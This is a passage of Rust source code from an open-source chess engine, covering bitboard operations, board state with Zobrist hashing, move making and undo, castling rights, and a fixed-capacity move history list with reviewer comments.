    pub fn pop_sq(&mut self) -> Option<Square> {
        let tzs = self.0.trailing_zeros();
        if tzs >= 64 {
            None
        } else {
            // let sq: Square = (tzs as usize).try_into().unwrap();
            // this should be faster than try_into().unwrap()
            // SAFETY-assumption: relies on Square being repr(u8) with
            // contiguous discriminants 0..=63 (tzs < 64 here) — Square is
            // defined elsewhere; confirm its repr before changing it.
            let sq: Square = unsafe { std::mem::transmute(tzs as u8) };
            // self.unset(sq);
            self.0 &= !(1 << tzs);
            Some(sq)
        }
    }
    /// Returns true when any bit is set.
    pub fn non_zero(&self) -> bool {
        self.0 > 0
    }
    /// Returns the lowest set square without removing it.
    pub fn peek(&self) -> Option<Square> {
        let tzs = self.0.trailing_zeros();
        if tzs >= 64 {
            None
        } else {
            // let sq: Square = (tzs as usize).try_into().unwrap();
            // this should be faster than try_into().unwrap()
            // SAFETY-assumption: same repr(u8) 0..=63 assumption as pop_sq.
            let sq: Square = unsafe { std::mem::transmute(tzs as u8) };
            Some(sq)
        }
    }
}
// Allows comparing a BitBoard directly against a raw u64 mask.
impl PartialEq<u64> for BitBoard {
    fn eq(&self, other: &u64) -> bool {
        self.0 == *other
    }
}
// Unwraps the raw u64.
impl From<BitBoard> for u64 {
    fn from(value: BitBoard) -> Self {
        value.0
    }
}
// Wraps a raw u64.
impl From<u64> for BitBoard {
    fn from(value: u64) -> Self {
        Self(value)
    }
}
// Pretty-prints the board as 8 binary rows (rank 8 at the top), with set
// bits as '1', empty squares as '.', and rank/file labels.
impl Display for BitBoard {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let mut b = (0..8)
            .rev()
            .map(|x| {
                // Extract rank x as one byte, render it in binary with the
                // rank number appended.
                format!(
                    "{:08b} {}",
                    ((self.0 & (0xff << x * 8)) >> x * 8) as u8,
                    x + 1
                )
            })
            // Binary prints MSB (file h) first; reversing each row puts
            // file a on the left and the rank label at the start.
            .map(|s| s.chars().rev().collect::<String>())
            .collect::<Vec<String>>()
            .join("\n");
        b.push_str("\n abcdefgh");
        b = b.replace("0", ".");
        write!(f, "{}", b)
    }
}
// Set union.
impl BitOr for BitBoard {
    type Output = Self;
    fn bitor(self, rhs: Self) -> Self::Output {
        Self(self.0 | rhs.0)
    }
}
// In-place set union.
impl BitOrAssign for BitBoard {
    fn bitor_assign(&mut self, rhs: Self) {
        *self = Self(self.0 | rhs.0)
    }
}
// Set intersection.
impl BitAnd for BitBoard {
    type Output = Self;
    fn bitand(self, rhs: Self) -> Self::Output {
        Self(self.0 & rhs.0)
    }
}
// In-place set intersection.
impl BitAndAssign for BitBoard {
    fn bitand_assign(&mut self, rhs: Self) {
        *self = Self(self.0 & rhs.0)
    }
}
// Right shift by another bitboard's raw value (shift amount in rhs).
impl Shr<BitBoard> for BitBoard {
    type Output = Self;
    fn shr(self, Self(rhs): Self) -> Self::Output {
        let Self(lhs) = self;
        Self(lhs >> rhs)
    }
}
// Left shift by another bitboard's raw value (shift amount in rhs).
impl Shl<BitBoard> for BitBoard {
    type Output = Self;
    fn shl(self, Self(rhs): Self) -> Self::Output {
        let Self(lhs) = self;
        Self(lhs << rhs)
    }
}
// Set complement.
impl Not for BitBoard {
    type Output = Self;
    fn not(self) -> Self::Output {
        Self(!self.0)
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/mod.rs | chrs-lib/src/data/mod.rs | pub mod bitboard;
mod fen;
mod moves;
pub mod piece;
mod square;
use crate::zobrist::{hash, update_castle, update_ep, update_side};
use crate::{generator::MoveGenerator, zobrist::update_piece};
use fen::Fen;
use moves::CastleType;
use std::str::FromStr;
use strum::IntoEnumIterator;
pub use bitboard::BitBoard;
pub use moves::{List, Move, MoveCommit, MoveList, MoveType};
pub use piece::{BoardPiece, Color, B_PIECES, W_PIECES};
pub use square::Square;
pub type BoardMap = [BitBoard; 12];
/// Game result state; `Mate(c)` means side `c` has been checkmated.
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub enum GameState {
    InPlay,
    Mate(Color),
    StaleMate,
}
/// Full mutable position: per-piece bitboards plus all FEN state, the
/// move history (for undo) and an incrementally-maintained Zobrist hash.
#[derive(Debug, Clone)]
pub struct BoardConfig {
    // Side to move.
    active_color: Color,
    // Square a pawn may capture onto en passant, if any.
    en_passant_target: Option<Square>,
    // Remaining castling rights, one bit each.
    castle_flags: CastleFlags,
    halfmove_clock: u8,
    fullmove_number: u8,
    pub bitboards: BoardMap,
    pub move_history: Box<List<MoveCommit>>,
    pub state: GameState,
    // Zobrist hash, updated incrementally on every mutation.
    hash: u64,
}
// Default is the standard chess starting position.
impl Default for BoardConfig {
    fn default() -> Self {
        Fen::make_config_from_str("rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1")
    }
}
impl BoardConfig {
    /// Current Zobrist hash of the position.
    pub fn get_hash(&self) -> u64 {
        self.hash
    }
    /// Prints the board (figurines, hash and FEN) to stdout.
    pub fn print_board(&self) {
        println!("{}", self.to_string());
    }
    /// Marks side `c` as checkmated.
    pub fn set_mate(&mut self, c: Color) {
        self.state = GameState::Mate(c);
    }
    /// Marks the game as drawn by stalemate.
    pub fn set_stalemate(&mut self) {
        self.state = GameState::StaleMate;
    }
    /// Current game state.
    pub fn get_state(&self) -> GameState {
        self.state
    }
    // Replaces the en-passant target, XOR-ing the old and new targets out
    // of / into the Zobrist hash.
    fn set_ep_target(&mut self, t: Square) {
        if let Some(t) = self.en_passant_target {
            update_ep(t, &mut self.hash)
        }
        self.en_passant_target = Some(t);
        update_ep(t, &mut self.hash)
    }
    // Clears the en-passant target, keeping the Zobrist hash in sync.
    fn clear_ep_target(&mut self) {
        if let Some(t) = self.en_passant_target {
            update_ep(t, &mut self.hash)
        }
        self.en_passant_target = None;
    }
    /// Renders the board with Unicode figurines, rank/file labels, the
    /// recomputed hash and the FEN string.
    pub fn to_string(&self) -> String {
        let mut s = String::new();
        for y in (0..8).rev() {
            s = format!("{}{}", s, y + 1);
            for x in 0..8 {
                let sq = Square::try_from((x, y)).unwrap();
                if let Some(p) = self.get_at_sq(sq) {
                    s = format!("{} {}", s, p.utf_str());
                } else {
                    s = format!("{} .", s);
                }
            }
            s = format!("{}\n", s);
        }
        s = format!("{} a b c d e f g h", s);
        s = format!("{}\nHash: {:x}", s, hash(self));
        s = format!("{}\nFEN: {}", s, self.get_fen());
        s
    }
    /// Most recent move commit, if any.
    /// NOTE(review): this relies on `List::get_last`, which indexes one
    /// slot past the last pushed element — see the fix on `List<T>`.
    pub fn get_last_commit(&self) -> Option<MoveCommit> {
        self.move_history.get_last()
    }
    /// Executes `m` and records the commit in the history (no-op if the
    /// move is rejected, e.g. wrong side to move).
    pub fn apply_move(&mut self, m: Move) {
        if let Some(commit) = self.make_move(m) {
            log::info!("{:?}", commit);
            self.move_history.push(commit);
        }
    }
    /// Returns true when `side`'s king square is attacked by the opponent.
    pub fn is_king_in_check(&self, gen: &MoveGenerator, side: Color) -> bool {
        let sq = match side {
            Color::White => self.bitboards[BoardPiece::WhiteKing as usize].peek(),
            Color::Black => self.bitboards[BoardPiece::BlackKing as usize].peek(),
        };
        if let Some(sq) = sq {
            return gen.is_sq_attacked(sq, !side, &self);
        }
        false
    }
    /// Executes `m`, updating bitboards, castling rights, en-passant
    /// state, counters and the Zobrist hash. Returns the commit needed to
    /// undo it, or `None` when it is not `m.p`'s side to move.
    pub fn make_move(&mut self, m: Move) -> Option<MoveCommit> {
        // prevent from moving when its not their turn
        if m.p.get_color() != self.active_color {
            return None;
        }
        let prev_ep_target = self.en_passant_target;
        let prev_castle_flags = self.castle_flags;
        use MoveType::*;
        match m.move_type {
            Normal => self.make_normal(&m),
            DoublePush => self.make_double_push(&m),
            EnPassant => self.make_en_passant(&m),
            Castle(castle_type) => self.make_castle(&m, castle_type),
            Promotion(prom) => {
                if let Some(prom) = prom {
                    self.make_promotion(&m, prom)
                } else {
                    log::error!("Promotion Move has no promotion piece assigned to it");
                    panic!();
                }
            }
        };
        // en passant state update
        if m.move_type != DoublePush {
            self.clear_ep_target();
        }
        // castling state update
        // Touching a rook home square (moving from it or capturing on it)
        // forfeits that side's corresponding right.
        if m.from == Square::A1 || m.to == Square::A1 {
            self.castle_flags.unset_white_ooo();
        } else if m.from == Square::A8 || m.to == Square::A8 {
            self.castle_flags.unset_black_ooo();
        } else if m.from == Square::H1 || m.to == Square::H1 {
            self.castle_flags.unset_white_oo();
        } else if m.from == Square::H8 || m.to == Square::H8 {
            self.castle_flags.unset_black_oo();
        }
        // Touching a king home square forfeits both of that side's rights.
        if m.from == Square::E1 || m.to == Square::E1 {
            self.castle_flags.unset_white_oo();
            self.castle_flags.unset_white_ooo();
        } else if m.from == Square::E8 || m.to == Square::E8 {
            self.castle_flags.unset_black_oo();
            self.castle_flags.unset_black_ooo();
        }
        // XOR delta of the flags is stored so undo can restore them.
        let castledelta = self.castle_flags.0 ^ prev_castle_flags.0;
        if self.active_color == Color::Black {
            self.fullmove_number += 1;
        }
        update_castle(prev_castle_flags.raw(), &mut self.hash);
        update_castle(self.castle_flags.raw(), &mut self.hash);
        // NOTE(review): the halfmove clock is incremented unconditionally;
        // FEN semantics reset it on pawn moves and captures — confirm
        // whether any fifty-move logic depends on this counter.
        self.halfmove_clock += 1;
        self.toggle_active_color();
        Some(MoveCommit::new(m, prev_ep_target, CastleFlags(castledelta)))
    }
    // Plain move (with optional capture on the destination square).
    fn make_normal(&mut self, m: &Move) {
        if let Some(cap) = m.capture {
            self.remove_piece(cap, m.to);
        }
        self.move_piece(m.p, m.from, m.to);
    }
    // Pawn double push: also records the skipped square as the e.p. target.
    fn make_double_push(&mut self, m: &Move) {
        self.move_piece(m.p, m.from, m.to);
        if m.p.get_color() == Color::White {
            // self.set_ep_target(Square::try_from(m.to as usize - 8).unwrap());
            // SAFETY-assumption: Square is assumed repr(u8) with contiguous
            // 0..=63 discriminants; m.to is off the back rank here.
            self.set_ep_target(unsafe { std::mem::transmute::<u8, Square>(m.to as u8 - 8) });
        } else {
            // self.set_ep_target(Square::try_from(m.to as usize + 8).unwrap());
            self.set_ep_target(unsafe { std::mem::transmute::<u8, Square>(m.to as u8 + 8) });
        }
    }
    // En-passant capture: the captured pawn sits behind the destination.
    fn make_en_passant(&mut self, m: &Move) {
        self.move_piece(m.p, m.from, m.to);
        if m.p.get_color() == Color::White {
            self.remove_piece(
                m.capture.unwrap(),
                unsafe { std::mem::transmute::<u8, Square>(m.to as u8 - 8) }, // Square::try_from(m.to as usize - 8).unwrap(),
            )
        } else {
            self.remove_piece(
                m.capture.unwrap(),
                unsafe { std::mem::transmute::<u8, Square>(m.to as u8 + 8) }, // Square::try_from(m.to as usize + 8).unwrap(),
            )
        }
    }
    // Castling: moves king and rook and forfeits both rights of that side.
    fn make_castle(&mut self, m: &Move, castle_type: CastleType) {
        let pcolor = m.p.get_color();
        match castle_type {
            CastleType::KingSide => {
                if pcolor == Color::White {
                    self.move_piece(BoardPiece::WhiteKing, Square::E1, Square::G1);
                    self.move_piece(BoardPiece::WhiteRook, Square::H1, Square::F1);
                }
                if pcolor == Color::Black {
                    self.move_piece(BoardPiece::BlackKing, Square::E8, Square::G8);
                    self.move_piece(BoardPiece::BlackRook, Square::H8, Square::F8);
                }
            }
            CastleType::QueenSide => {
                if pcolor == Color::White {
                    self.move_piece(BoardPiece::WhiteKing, Square::E1, Square::C1);
                    self.move_piece(BoardPiece::WhiteRook, Square::A1, Square::D1);
                }
                if pcolor == Color::Black {
                    self.move_piece(BoardPiece::BlackKing, Square::E8, Square::C8);
                    self.move_piece(BoardPiece::BlackRook, Square::A8, Square::D8);
                }
            }
        }
        match pcolor {
            Color::White => {
                self.castle_flags.unset_white_oo();
                self.castle_flags.unset_white_ooo();
            }
            Color::Black => {
                self.castle_flags.unset_black_oo();
                self.castle_flags.unset_black_ooo();
            }
        }
    }
    // Promotion: the pawn is removed and the promoted piece is added.
    fn make_promotion(&mut self, m: &Move, prom: BoardPiece) {
        if let Some(cap) = m.capture {
            self.remove_piece(cap, m.to);
        }
        self.remove_piece(m.p, m.from);
        self.add_piece(prom, m.to);
    }
    /// Reverts the most recent move (if any) and resets the game state to
    /// in-play.
    pub fn undo(&mut self) {
        if let Some(commit) = self.move_history.pop() {
            self.undo_commit(&commit);
        }
        self.state = GameState::InPlay;
    }
    /// Reverts `commit`, restoring bitboards, counters, castling rights,
    /// en-passant state and the Zobrist hash.
    pub fn undo_commit(&mut self, commit: &MoveCommit) {
        let pcolor = commit.m.p.get_color();
        use MoveType::*;
        match commit.m.move_type {
            Normal => self.undo_normal(&commit),
            DoublePush => self.undo_double_push(&commit),
            EnPassant => self.undo_en_passant(&commit),
            Castle(castle_type) => self.undo_castle(&commit, castle_type),
            Promotion(prom) => {
                if let Some(prom) = prom {
                    self.undo_promotion(&commit, prom);
                } else {
                    log::error!("Promotion Move has no promotion piece assigned to it");
                    panic!();
                }
            }
        }
        if pcolor == Color::Black {
            self.fullmove_number -= 1;
        }
        if let Some(t) = commit.ep_target {
            self.set_ep_target(t);
        } else {
            self.clear_ep_target();
        }
        // Re-apply the stored XOR delta to recover the previous flags.
        let oldcastleflags = self.castle_flags.0 ^ commit.castledelta.0;
        update_castle(self.castle_flags.raw(), &mut self.hash);
        update_castle(oldcastleflags, &mut self.hash);
        self.castle_flags = CastleFlags(oldcastleflags);
        // NOTE(review): underflows (panics in debug) if undoing from a
        // position loaded with halfmove clock 0 — confirm callers.
        self.halfmove_clock -= 1;
        self.toggle_active_color();
    }
    fn undo_normal(&mut self, commit: &MoveCommit) {
        self.move_piece(commit.m.p, commit.m.to, commit.m.from);
        if let Some(cap) = commit.m.capture {
            self.add_piece(cap, commit.m.to);
        }
    }
    fn undo_double_push(&mut self, commit: &MoveCommit) {
        self.move_piece(commit.m.p, commit.m.to, commit.m.from);
    }
    fn undo_castle(&mut self, commit: &MoveCommit, castle_type: CastleType) {
        match commit.m.p.get_color() {
            Color::White => match castle_type {
                CastleType::KingSide => {
                    self.move_piece(BoardPiece::WhiteKing, Square::G1, Square::E1);
                    self.move_piece(BoardPiece::WhiteRook, Square::F1, Square::H1);
                }
                CastleType::QueenSide => {
                    self.move_piece(BoardPiece::WhiteKing, Square::C1, Square::E1);
                    self.move_piece(BoardPiece::WhiteRook, Square::D1, Square::A1);
                }
            },
            Color::Black => match castle_type {
                CastleType::KingSide => {
                    self.move_piece(BoardPiece::BlackKing, Square::G8, Square::E8);
                    self.move_piece(BoardPiece::BlackRook, Square::F8, Square::H8);
                }
                CastleType::QueenSide => {
                    self.move_piece(BoardPiece::BlackKing, Square::C8, Square::E8);
                    self.move_piece(BoardPiece::BlackRook, Square::D8, Square::A8);
                }
            },
        }
    }
    fn undo_promotion(&mut self, commit: &MoveCommit, prom: BoardPiece) {
        self.remove_piece(prom, commit.m.to);
        match commit.m.p.get_color() {
            Color::White => self.add_piece(BoardPiece::WhitePawn, commit.m.from),
            Color::Black => self.add_piece(BoardPiece::BlackPawn, commit.m.from),
        }
        if let Some(cap) = commit.m.capture {
            self.add_piece(cap, commit.m.to);
        }
    }
    fn undo_en_passant(&mut self, commit: &MoveCommit) {
        self.move_piece(commit.m.p, commit.m.to, commit.m.from);
        // The captured pawn is restored behind the destination square.
        let cap_sq = if commit.m.p.get_color() == Color::White {
            Square::try_from(commit.m.to as usize - 8).unwrap()
        } else {
            Square::try_from(commit.m.to as usize + 8).unwrap()
        };
        self.add_piece(commit.m.capture.unwrap(), cap_sq);
    }
    /// Resets to the standard starting position.
    pub fn reset(&mut self) {
        *self = BoardConfig::default();
    }
    /// Builds a config from a FEN string.
    pub fn from_fen_str(s: &str) -> Self {
        Fen::make_config_from_str(s)
    }
    /// Replaces this config with one parsed from a FEN string.
    pub fn load_fen(&mut self, s: &str) {
        *self = Fen::make_config_from_str(s);
    }
    /// Serializes the position to FEN.
    pub fn get_fen(&self) -> String {
        Fen::make_fen_from_config(self)
    }
    /// Piece occupying `sq`, if any (linear scan over the 12 bitboards).
    pub fn get_at_sq(&self, sq: Square) -> Option<BoardPiece> {
        for piece in BoardPiece::iter() {
            if self.bitboards[piece as usize].is_set(sq) {
                return Some(piece);
            }
        }
        None
    }
    /// Side to move.
    pub fn get_active_color(&self) -> Color {
        self.active_color
    }
    pub fn get_can_white_castle_queenside(&self) -> bool {
        self.castle_flags.can_white_ooo()
    }
    pub fn get_can_white_castle_kingside(&self) -> bool {
        self.castle_flags.can_white_oo()
    }
    pub fn get_can_black_castle_queenside(&self) -> bool {
        self.castle_flags.can_black_ooo()
    }
    pub fn get_can_black_castle_kingside(&self) -> bool {
        self.castle_flags.can_black_oo()
    }
    pub fn get_en_passant_target(&self) -> Option<Square> {
        self.en_passant_target
    }
    pub fn get_halfmove_clock(&self) -> u8 {
        self.halfmove_clock
    }
    pub fn get_fullmove_number(&self) -> u8 {
        self.fullmove_number
    }
    /// Bitboard for the piece whose FEN letter is `c`, if valid.
    pub fn get_bit_board(&self, c: char) -> Option<BitBoard> {
        if let Ok(p) = BoardPiece::from_str(&c.to_string()) {
            return Some(self.bitboards[p as usize]);
        }
        None
    }
    /// Bitboard for piece kind `p`.
    pub fn get_piece_occupancy(&self, p: BoardPiece) -> BitBoard {
        self.bitboards[p as usize]
    }
    /// Union of all twelve piece bitboards.
    pub fn all_occupancy(&self) -> BitBoard {
        let mut ret = BitBoard::from(0);
        for bb in self.bitboards.iter() {
            ret |= *bb;
        }
        ret
    }
    /// Union of the six white piece bitboards.
    pub fn white_occupancy(&self) -> BitBoard {
        let mut ret = BitBoard::from(0);
        use BoardPiece::*;
        ret |= self.bitboards[WhiteRook as usize]
            | self.bitboards[WhiteBishop as usize]
            | self.bitboards[WhiteKnight as usize]
            | self.bitboards[WhiteKing as usize]
            | self.bitboards[WhiteQueen as usize]
            | self.bitboards[WhitePawn as usize];
        ret
    }
    /// Union of the six black piece bitboards.
    pub fn black_occupancy(&self) -> BitBoard {
        let mut ret = BitBoard::from(0);
        use BoardPiece::*;
        ret |= self.bitboards[BlackRook as usize]
            | self.bitboards[BlackBishop as usize]
            | self.bitboards[BlackKnight as usize]
            | self.bitboards[BlackKing as usize]
            | self.bitboards[BlackQueen as usize]
            | self.bitboards[BlackPawn as usize];
        ret
    }
    /// Raw castling-rights bits.
    pub fn get_castle_flags_raw(&self) -> u8 {
        self.castle_flags.raw()
    }
    // Moves `p` between squares, updating the hash via remove/add.
    fn move_piece(&mut self, p: BoardPiece, from: Square, to: Square) {
        self.remove_piece(p, from);
        self.add_piece(p, to);
    }
    fn remove_piece(&mut self, p: BoardPiece, from: Square) {
        self.remove_from_bitboard(p, from);
        update_piece(from, p, &mut self.hash);
    }
    fn add_piece(&mut self, p: BoardPiece, to: Square) {
        self.add_to_bitboard(p, to);
        update_piece(to, p, &mut self.hash);
    }
    // Flips the side to move, XOR-ing both sides through the hash.
    fn toggle_active_color(&mut self) {
        update_side(self.active_color, &mut self.hash);
        self.active_color = !self.active_color;
        update_side(self.active_color, &mut self.hash);
    }
    fn remove_from_bitboard(&mut self, p: BoardPiece, pos: Square) {
        *self.bitboards[p as usize] &= !(1 << pos as usize);
    }
    fn add_to_bitboard(&mut self, p: BoardPiece, pos: Square) {
        *self.bitboards[p as usize] |= 1 << pos as usize;
    }
}
/// Castling rights packed into one byte: bit 0 = white O-O, bit 1 =
/// white O-O-O, bit 2 = black O-O, bit 3 = black O-O-O.
#[derive(Debug, Default, Clone, Copy)]
pub struct CastleFlags(u8);
impl CastleFlags {
    // One bit per castling right.
    const W_OO: u8 = 1 << 0;
    const W_OOO: u8 = 1 << 1;
    const B_OO: u8 = 1 << 2;
    const B_OOO: u8 = 1 << 3;

    pub fn can_white_oo(&self) -> bool {
        self.0 & Self::W_OO != 0
    }
    pub fn set_white_oo(&mut self) {
        self.0 |= Self::W_OO;
    }
    pub fn unset_white_oo(&mut self) {
        self.0 &= !Self::W_OO;
    }
    pub fn can_white_ooo(&self) -> bool {
        self.0 & Self::W_OOO != 0
    }
    pub fn set_white_ooo(&mut self) {
        self.0 |= Self::W_OOO;
    }
    pub fn unset_white_ooo(&mut self) {
        self.0 &= !Self::W_OOO;
    }
    pub fn can_black_oo(&self) -> bool {
        self.0 & Self::B_OO != 0
    }
    pub fn set_black_oo(&mut self) {
        self.0 |= Self::B_OO;
    }
    pub fn unset_black_oo(&mut self) {
        self.0 &= !Self::B_OO;
    }
    pub fn can_black_ooo(&self) -> bool {
        self.0 & Self::B_OOO != 0
    }
    pub fn set_black_ooo(&mut self) {
        self.0 |= Self::B_OOO;
    }
    pub fn unset_black_ooo(&mut self) {
        self.0 &= !Self::B_OOO;
    }
    /// Raw packed bits.
    pub fn raw(&self) -> u8 {
        self.0
    }
}
// Marker error: no piece on the queried square. Currently unused here;
// kept for internal use.
#[derive(Debug)]
struct NoPieceErr;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/moves.rs | chrs-lib/src/data/moves.rs | use super::piece::BoardPiece;
use super::square::Square;
use super::{BoardConfig, CastleFlags};
use std::fmt::{Debug, Display, Formatter, Result};
use std::ops::{Deref, DerefMut};
/// Which side of the board a castling move is on.
#[derive(Clone, Copy, Eq, PartialEq, Debug)]
pub enum CastleType {
    KingSide,
    QueenSide,
}
/// Classification of a move; `Promotion(None)` is a promotion whose
/// piece has not been chosen yet (e.g. awaiting UI selection).
#[derive(Debug, PartialEq, Eq, Copy, Clone)]
pub enum MoveType {
    Normal,
    DoublePush,
    EnPassant,
    Castle(CastleType),
    Promotion(Option<BoardPiece>),
}
/// A single move: moving piece, origin, destination, optional captured
/// piece and its classification.
#[derive(Debug, Copy, Clone, Eq, PartialEq)]
pub struct Move {
    pub from: Square,
    pub to: Square,
    pub p: BoardPiece,
    pub capture: Option<BoardPiece>,
    pub move_type: MoveType,
}
// Placeholder move (a1 -> a1 white pawn).
impl Default for Move {
    fn default() -> Self {
        Self {
            from: Square::A1,
            to: Square::A1,
            p: BoardPiece::WhitePawn,
            capture: None,
            // NOTE(review): EnPassant looks unintended for a placeholder
            // default (Normal expected) — confirm no caller relies on it
            // before changing.
            move_type: MoveType::EnPassant,
        }
    }
}
// UCI-style long algebraic notation, e.g. "e2e4" or "e7e8q".
impl Display for Move {
    fn fmt(&self, f: &mut Formatter<'_>) -> Result {
        match self.move_type {
            MoveType::Promotion(Some(prom)) => write!(f, "{}{}{}", self.from, self.to, prom),
            _ => write!(f, "{}{}", self.from, self.to),
        }
    }
}
impl Move {
    /// Constructs a move with an explicit classification.
    pub fn new(
        from: Square,
        to: Square,
        p: BoardPiece,
        capture: Option<BoardPiece>,
        m: MoveType,
    ) -> Self {
        Self {
            from,
            to,
            p,
            capture,
            move_type: m,
        }
    }
    /// Constructs a promotion move promoting to `prom`.
    pub fn new_prom(
        from: Square,
        to: Square,
        p: BoardPiece,
        capture: Option<BoardPiece>,
        prom: BoardPiece,
    ) -> Self {
        Self {
            from,
            to,
            p,
            capture,
            move_type: MoveType::Promotion(Some(prom)),
        }
    }
    /// Infers the move type (castle, double push, en passant, promotion,
    /// normal) purely from `from`/`to` and the current position `c`.
    ///
    /// Panics if `from` is empty. Assumes the move is pseudo-legal for
    /// the piece found on `from`.
    pub fn infer(from: Square, to: Square, c: &BoardConfig) -> Self {
        use MoveType::*;
        let p = c.get_at_sq(from).unwrap();
        let mut move_type: MoveType = Normal;
        let mut capture = c.get_at_sq(to);
        // Castling
        if p == BoardPiece::WhiteKing {
            if from == Square::E1 && to == Square::G1 {
                move_type = Castle(CastleType::KingSide);
            } else if from == Square::E1 && to == Square::C1 {
                move_type = Castle(CastleType::QueenSide);
            }
        } else if p == BoardPiece::BlackKing {
            if from == Square::E8 && to == Square::G8 {
                move_type = Castle(CastleType::KingSide);
            } else if from == Square::E8 && to == Square::C8 {
                move_type = Castle(CastleType::QueenSide);
            }
        }
        // Pawn: Double Push, En Passant and Promotion
        else if p == BoardPiece::WhitePawn {
            // NOTE(review): `to - from` underflows (debug panic) if a
            // white pawn ever moves backwards; relies on pseudo-legality.
            if to as usize - from as usize == 16 {
                move_type = DoublePush;
            } else if let Some(t) = c.en_passant_target {
                if to == t {
                    // The captured pawn sits one rank behind the target.
                    // SAFETY-assumption: Square assumed repr(u8), 0..=63.
                    capture = c.get_at_sq(unsafe { std::mem::transmute(t as u8 - 8) });
                    move_type = EnPassant;
                }
            }
            if to >= Square::A8 {
                move_type = Promotion(None);
            }
        } else if p == BoardPiece::BlackPawn {
            if from as usize - to as usize == 16 {
                move_type = DoublePush;
            } else if let Some(t) = c.en_passant_target {
                if to == t {
                    capture = c.get_at_sq(unsafe { std::mem::transmute(t as u8 + 8) });
                    move_type = EnPassant;
                }
            }
            if to <= Square::H1 {
                move_type = Promotion(None)
            }
        }
        Self {
            from,
            to,
            p,
            capture,
            move_type,
        }
    }
    /// True for any promotion (piece chosen or not).
    pub fn is_prom(&self) -> bool {
        if let MoveType::Promotion(_) = self.move_type {
            return true;
        }
        false
    }
    /// True for a promotion whose piece has not yet been chosen.
    pub fn is_empty_prom(&self) -> bool {
        if let MoveType::Promotion(p) = self.move_type {
            return p == None;
        }
        false
    }
    /// Sets the promotion piece; no-op for non-promotion moves.
    pub fn set_prom(&mut self, p: BoardPiece) {
        if self.is_prom() {
            self.move_type = MoveType::Promotion(Some(p));
        }
    }
}
/// An executed move plus the state required to undo it: the previous
/// en-passant target and the XOR delta of the castling flags.
#[derive(Debug, Copy, Clone)]
pub struct MoveCommit {
    pub m: Move,
    pub ep_target: Option<Square>,
    pub castledelta: CastleFlags,
}
// Human-readable (roughly algebraic) rendering of a committed move.
// Branch order matters: en passant first, then any capture, castles,
// promotion, and finally a quiet move.
impl Display for MoveCommit {
    fn fmt(&self, f: &mut Formatter<'_>) -> Result {
        use MoveType::*;
        if self.m.move_type == EnPassant {
            write!(f, "{}{}{}e.p.", self.m.p.utf_str(), self.m.from, self.m.to)
        } else if self.m.capture.is_some() {
            write!(f, "{}{}x{}", self.m.p.utf_str(), self.m.from, self.m.to)
        } else if self.m.move_type == Castle(CastleType::KingSide) {
            write!(f, "0-0")
        } else if self.m.move_type == Castle(CastleType::QueenSide) {
            write!(f, "0-0-0")
        } else if let Promotion(Some(prom)) = self.m.move_type {
            write!(f, "{}{}", self.m.to, prom.utf_str())
        } else {
            write!(f, "{}{}{}", self.m.p.utf_str(), self.m.from, self.m.to)
        }
    }
}
impl MoveCommit {
    /// Bundle a move with the undo metadata captured when it was applied.
    pub fn new(m: Move, ep_target: Option<Square>, castledelta: CastleFlags) -> Self {
        Self {
            m,
            ep_target,
            castledelta,
        }
    }
}
/// Fixed-capacity, heap-free stack of up to 255 entries.
///
/// Only the first `counter` slots are "live"; slots at `counter` and beyond
/// may contain stale values and must never be read directly.
#[derive(Debug, Clone)]
pub struct List<T> {
    // Backing storage for all 255 slots.
    pub list: [Option<T>; 255],
    // Number of live elements (equivalently: the next free slot index).
    pub counter: u8,
    // Maximum number of elements (always 255 via `Default`).
    capacity: u8,
}
impl<T: Copy> Default for List<T> {
fn default() -> Self {
List {
list: [None; 255],
counter: 0,
capacity: 255,
}
}
}
impl<T: Copy> List<T> {
    /// Reset the list to empty. Stale `Some` entries remain in the backing
    /// array, but `pop`/`get_last` guard on `counter` and never observe them.
    pub fn clear(&mut self) {
        self.counter = 0;
    }
    /// Append an element; logs and panics when the list is full.
    pub fn push(&mut self, m: T) {
        if self.counter == self.capacity {
            log::error!("MoveHistory is out of capacity");
            panic!();
        }
        self.list[self.counter as usize] = Some(m);
        self.counter += 1;
    }
    /// Remove and return the most recently pushed element, or `None` when
    /// the list is empty.
    pub fn pop(&mut self) -> Option<T> {
        if self.counter == 0 {
            // Fix: previously this read (and cleared) slot 0 even when the
            // list was empty, which could hand back a stale value left
            // behind by `clear`.
            return None;
        }
        self.counter -= 1;
        self.list[self.counter as usize].take()
    }
    /// Peek at the most recently pushed element without removing it.
    pub fn get_last(&self) -> Option<T> {
        // Fix: the last live element lives at `counter - 1`. Indexing
        // `counter` read one slot past the end — always `None`, and
        // out-of-bounds once the list was at full capacity.
        if self.counter == 0 {
            None
        } else {
            self.list[self.counter as usize - 1]
        }
    }
    /// Mutable view over the live prefix.
    pub fn data(&mut self) -> &mut [Option<T>] {
        &mut self.list[..(self.counter as usize)]
    }
    /// Number of live elements.
    pub fn len(&self) -> usize {
        self.counter as usize
    }
    /// `true` when the list holds no elements (companion to `len`).
    pub fn is_empty(&self) -> bool {
        self.counter == 0
    }
    /// Iterate over the live prefix; every yielded entry is `Some`.
    pub fn iter(&self) -> impl Iterator<Item = &Option<T>> {
        self.list.iter().take(self.counter as usize)
    }
}
impl List<Move> {
    /// `true` when any move in the live prefix targets `sq`.
    ///
    /// Entries in the live prefix are always `Some`, so the `unwrap` here
    /// cannot fire.
    pub fn has_target_sq(&self, sq: Square) -> bool {
        self.iter().any(|m| m.unwrap().to == sq)
    }
}
/// Growable move container backed by a `Vec<Move>`, dereferencing to it.
pub struct MoveList(pub Vec<Move>);
impl Deref for MoveList {
    type Target = Vec<Move>;
    // Expose the inner vector so `MoveList` can be used like a `Vec<Move>`.
    fn deref(&self) -> &Self::Target {
        &self.0
    }
}
impl DerefMut for MoveList {
    // Mutable counterpart of `Deref`, enabling `push`/`sort` etc. directly.
    fn deref_mut(&mut self) -> &mut Self::Target {
        &mut self.0
    }
}
impl MoveList {
